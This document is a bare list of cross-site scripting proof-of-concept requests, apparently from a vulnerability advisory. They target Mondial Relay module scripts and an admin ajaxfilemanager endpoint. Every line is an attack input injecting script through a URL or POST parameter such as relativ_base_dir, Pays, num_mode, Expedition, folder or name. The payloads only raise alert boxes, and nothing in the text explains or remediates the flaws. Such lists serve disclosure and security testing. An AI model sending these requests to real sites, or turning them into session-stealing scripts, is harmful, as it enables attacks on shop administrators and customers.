http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=>');alert('XSS'); http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=">');alert('XSS'); http://<app_base>/modules/mondialrelay/googlemap.php?Pays=');alert('XSS'); GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php POST: num_mode=<script>alert('XSS')</script> GET: http://<app_base>/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php POST: Expedition=<script>alert('XSS')</script> GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php POST: folder=<script>alert('XSS 1');</script>&name=<script>alert('XSS 2');</script>